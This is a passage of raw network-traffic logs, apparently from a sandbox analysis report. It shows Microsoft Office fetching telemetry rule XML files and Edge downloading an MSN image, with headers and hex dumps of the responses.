                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:51 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:52 UTC2779INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 47 72 61 6e 64 20 54 65 74 6f 6e 73 2c 20 57 79 6f 6d 69 6e 67 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 3d 47 72 61 6e 64 2b 54 65 74
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Grand Tetons, Wyoming\",\"cta\":\"https:\/\/www.bing.com\/search?q=Grand+Tet


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    111192.168.2.74989313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:52 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:52 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 432
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: da27d7c4-b01e-005c-4391-3f4c66000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080652Z-174f7845968g6hv8hC1EWR1v2n00000004gg000000008uvn
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:52 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    112192.168.2.74989513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:52 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 475
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3d9c2adf-901e-00ac-7b91-3fb69e000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080653Z-174f7845968nxc96hC1EWRspw80000000wd0000000004xm2
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    113192.168.2.74989613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4fa988ca-e01e-000c-2c91-3f8e36000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080653Z-174f7845968pf68xhC1EWRr4h80000000wv0000000008y8k
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    114192.168.2.74989813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 89e8b03d-001e-0065-5291-3f0b73000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080653Z-174f78459684bddphC1EWRbht40000000wg00000000007wv
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    115192.168.2.749900104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC634OUTGET /tenant/amp/entityid/BB1msIAw.img HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 28 Oct 2024 09:34:19 GMT
                                                                                                                                                                                                                                                                                                                    X-Datacenter: westus
                                                                                                                                                                                                                                                                                                                    X-ActivityId: d299da65-4796-4530-b965-ab450ac4c590
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msIAw
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 100376
                                                                                                                                                                                                                                                                                                                    Content-Length: 100376
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=178164
                                                                                                                                                                                                                                                                                                                    Expires: Fri, 29 Nov 2024 09:36:17 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC15863INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                                                                                    Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC16384INData Raw: 65 ae df 75 24 3b 65 96 c7 0b dd 49 0e 8e a8 74 75 a6 4f 9b 2b 95 1a 53 35 28 0a 3a 55 20 95 d2 98 ca 2a 39 4e 94 a2 a4 0b 20 bf a2 cf 78 c6 e0 db e3 92 d5 74 91 d1 43 78 17 3c ba 2a 4c e0 9a d4 c4 70 0b 39 ed be 5d 47 2d c2 dd 75 39 c4 c5 a6 08 c7 90 50 1e c1 8d ff 00 04 78 b3 81 a6 b9 6d f5 c8 c8 70 10 66 e6 2d 39 73 eb 16 85 10 01 3e 69 02 f8 09 be 43 11 9a d4 2d b7 6e 4a 39 69 3b ed cb b3 aa 3a 61 22 cc 80 d1 79 db 39 bd f2 85 5a 6e b5 61 ce 1a 74 e0 09 ca 63 33 27 a5 94 3d 2e b9 1e 31 cf 24 6b 3a a3 bb db 64 68 da 07 55 41 30 89 c2 d7 ec 54 31 45 4c ec 8c 8b b4 7e e9 db 28 84 a8 47 7f 7a e7 73 81 03 2f 89 e6 aa ce 84 f9 0a 6b 75 10 00 24 9c 00 19 a3 68 25 c0 5e e7 2b f6 73 54 d7 39 8e 05 a4 b4 83 63 84 74 57 df 99 fc d2 29 7b e0 33 55 a0 5c 02 48 b5
                                                                                                                                                                                                                                                                                                                    Data Ascii: eu$;eItuO+S5(:U *9N xtCx<*Lp9]G-u9Pxmpf-9s>iC-nJ9i;:a"y9Znatc3'=.1$k:dhUA0T1EL~(Gzs/ku$h%^+sT9ctW){3U\H
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC2977INData Raw: f8 fc 11 44 2b 4a cc 26 13 8f b4 09 0d 38 58 0b 61 84 08 f1 85 71 61 1f 68 45 61 88 4c c2 44 09 b4 ae b4 44 5e 71 f7 42 6e 9c d1 69 f1 4a c4 24 01 07 c2 2d 3d f3 65 50 a4 45 95 c2 76 32 3c 2e 8c 53 c8 54 2c 70 07 b5 3b 28 44 5b bd 11 16 8b 62 7a fd e1 36 11 b7 31 02 f9 9c ba 27 66 b2 32 e8 52 34 ab 10 2f 13 b0 cb c6 e0 ad 66 23 42 3d 30 01 b5 e4 44 df b3 2e 48 e1 54 24 31 71 8a a8 4d 84 71 3f 58 ad 63 11 08 a1 48 d2 8a 14 b6 43 62 21 2c 85 2a 15 69 4a c8 21 69 5e 1f e6 b5 8d 5a a3 87 c1 b4 e0 bb 1f 33 88 c3 a3 47 7a f4 fc 77 cc 19 c2 79 19 0f ab b7 ed 67 37 73 d8 76 af 01 ad d5 5e e7 1f 33 9c 49 71 cc 92 81 39 da a4 71 f7 66 bf 4a 7d 47 09 63 60 36 52 c9 7f ee 70 03 af d9 3f cf 87 bd 41 73 75 3b cc 40 e9 75 ca b9 b5 b1 59 c4 49 f2 0e bb fd a5 26 a5 58 b3
                                                                                                                                                                                                                                                                                                                    Data Ascii: D+J&8XaqahEaLDD^qBniJ$-=ePEv2<.ST,p;(D[bz61'f2R4/f#B=0D.HT$1qMq?XcHCb!,*iJ!i^Z3Gzwyg7sv^3Iq9qfJ}Gc`6Rp?Asu;@uYI&X
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC16384INData Raw: 66 b3 5c a4 ea 59 21 c1 3c 54 6e eb 91 83 a2 54 a0 48 35 00 55 ea 35 5d 8c 93 0a 2b 9a a5 35 ed 2a 9c 5a 8b 19 ae 23 4c c7 7b 52 08 53 5e e6 ee a2 97 37 75 d8 a4 74 a6 22 51 07 21 24 6e a8 10 a6 4d 09 a2 54 94 2e 94 40 a2 24 2e 5d e0 68 82 5a 50 68 52 65 10 21 36 c5 44 22 c4 b3 4e 72 5a 32 81 0e c9 a3 3f 42 63 69 9d 94 f0 a4 84 29 48 54 67 b6 91 52 45 27 29 c1 3c 15 c5 29 0a 8c e1 44 a6 7a 05 69 82 99 28 0d b3 51 9a 28 94 5e 99 0b 45 72 15 8c cd f4 c9 42 69 2d 34 97 15 69 8d 23 3f d3 41 e9 85 28 94 3a a4 00 70 0b a1 3e 65 91 7d 30 90 5a 14 c2 6c a3 23 26 58 82 d0 ac 35 a9 da 51 86 aa 72 cb 51 14 00 5c 48 4e 80 10 92 dd 90 31 67 c4 46 5b de 02 c8 7d 45 be fd 27 25 8d 52 36 5d 9d b6 b8 0c c7 75 45 18 d4 2a 79 85 1c b6 57 a2 98 88 be a1 5d ab aa 7e 94 5a 15
                                                                                                                                                                                                                                                                                                                    Data Ascii: f\Y!<TnTH5U5]+5*Z#L{RS^7ut"Q!$nMT.@$.]hZPhRe!6D"NrZ2?Bci)HTgRE')<)Dzi(Q(^ErBi-4i#?A(:p>e}0Zl#&X5QrQ\HN1gF[}E'%R6]uE*yW]~Z
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC16384INData Raw: ba ac de aa ff 00 fa 25 e7 fd 1e fd df f9 05 1c a8 d5 3d 60 7d d4 9a 7f 3c e0 9e d9 7e ba 6e fd 25 a4 f8 c8 b2 f9 a7 ab 4b 67 76 7e 68 bd 4a 5f d5 d8 b5 7f c7 c5 10 e2 8f a6 1f 9d 7c bc 7e f7 7f fc b7 2a fe f1 f2 ff 00 fd d2 3f d0 ff 00 b2 f9 9e ba 5b 9e c2 87 55 2d ff 00 f4 95 b0 ff 00 c6 5e a8 8c 28 fa 68 f9 bf 02 7f ef 47 56 bf ec 99 fd d3 80 ff 00 df 6f fb 5f ff 00 c2 be 5f 14 9d 9f fe 93 f6 40 45 2d ff 00 f4 bb ec 96 0b dc fc 0d 81 1f 5a 1c 77 06 6e 38 8a 5f ee fb a3 3c 5f 0b 13 eb d2 23 fe 43 f1 5f 1f d3 44 fe ee e7 7d 90 fa 74 7f 59 ff 00 d5 f6 5b cb eb e8 2c 28 fb 0d 2e 2b 86 ad 3a 2a 30 c6 39 1e f8 54 78 ae 15 b8 d5 67 6f d9 7c 77 4d 3c aa f7 3b ec af d3 19 71 14 fc 75 0f fe 95 4b b5 cf e6 6a 8f 33 eb e3 89 e1 9d 85 46 76 a6 1a 9c 38 c6 a3 3f dc
                                                                                                                                                                                                                                                                                                                    Data Ascii: %=`}<~n%Kgv~hJ_|~*?[U-^(hGVo__@E-Zwn8_<_#C_D}tY[,(.+:*09Txgo|wM<;quKj3Fv8?
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC7952INData Raw: 3e 49 c0 86 8c f2 54 28 b8 c4 b8 5b 0b e0 9a da 4d 81 7f 37 72 0b 71 26 83 a5 c4 16 1d 3e d4 1e d5 b1 ea 6a 20 dc 78 c4 78 c2 c5 6d 13 91 08 34 54 6c c3 a6 6d 8a e7 94 23 27 93 49 84 4e 8f 45 57 d2 70 01 c6 fc af de 97 a2 30 2d 2d e6 60 ac 2a 1e a3 5d 72 34 e7 9a d3 d6 c0 75 5e 3f 48 3e f5 ce fb 6e 39 26 d8 4c 49 ee 29 e1 d9 10 0e fb a5 16 bd e2 60 d8 5d 4d 6d 4a 04 c6 13 97 d5 97 55 a8 1a 20 b8 c1 04 2c 9b b4 ab d5 12 26 9b aa d2 7b 0b 09 24 49 8f bf 25 ea 1f c6 1a ba 7d 4e 1d da 80 89 1e 66 91 bc 8e f9 50 78 6a dc 2e 83 4f cd 48 c0 25 ce cc ef 2d db 6c 96 9d 2a 25 ae 69 d5 e4 75 8b c7 98 72 98 ef 51 3a d5 a5 6a eb 2c de d4 74 f6 f1 2c af e1 6f af 81 90 fa 94 88 98 8e 59 f6 ac ff 00 6f d9 2e e8 5a b6 78 9a 34 69 bd da 0e 1d 2f 9d a5 2a 99 d5 6d 50 3b 17
                                                                                                                                                                                                                                                                                                                    Data Ascii: >IT([M7rq&>j xxm4Tlm#'INEWp0--`*]r4u^?H>n9&LI)`]MmJU ,&{$I%}NfPxj.OH%-l*%iurQ:j,t,oYo.Zx4i/*mP;
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC16384INData Raw: ae e5 7c 83 4f 36 34 30 69 99 ba d9 34 e1 a0 61 0d 1d 0c 5c 95 98 e7 b7 d3 0d 02 4c df f2 53 c5 49 0e ce 6d 3f a4 1f ba e5 9e 27 9f 30 b1 a5 91 3f 87 04 32 ee f6 8c f8 2a 73 88 a7 a8 e2 f7 24 53 71 f4 80 1b 1c 79 95 4f 71 24 36 d6 16 5c f8 6e 4f 4d 7c 11 d5 74 b6 1a dc 29 bf 45 ee ff 00 ed 05 e0 78 6b 15 ee bf ed 05 c7 dd d4 e9 ed bf 84 86 4d d6 45 73 65 3d c5 67 56 c1 4a 42 9e 86 0d 42 b4 f8 47 41 0b 1e a1 bd 94 ca 0e f3 2e c9 46 e2 73 41 d4 8f ae 70 4f 5e b4 dd ab e7 7c 0d 4c 17 bf 61 96 af 12 aa 4c f6 5e 69 33 ce f1 2d c5 78 3e 21 b0 57 d0 f8 a0 bc 37 12 2e ba 3b 60 fb 9a 1e 7e 74 a9 ec 70 31 0b 31 ca 4b 0c 05 d7 2d 0e 14 f3 36 03 93 a6 c5 67 35 f7 52 9a f9 b2 1d 64 17 15 99 15 9b 24 af 2f 55 97 9d 51 7e dd d7 b7 7e 33 cd 79 ee 3e a8 30 d0 c6 b5 a3 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: |O640i4a\LSIm?'0?2*s$SqyOq$6\nOM|t)ExkMEse=gVJBBGA.FsApO^|LaL^i3-x>!W7.;`~tp11K-6g5Rd$/UQ~~3y>0
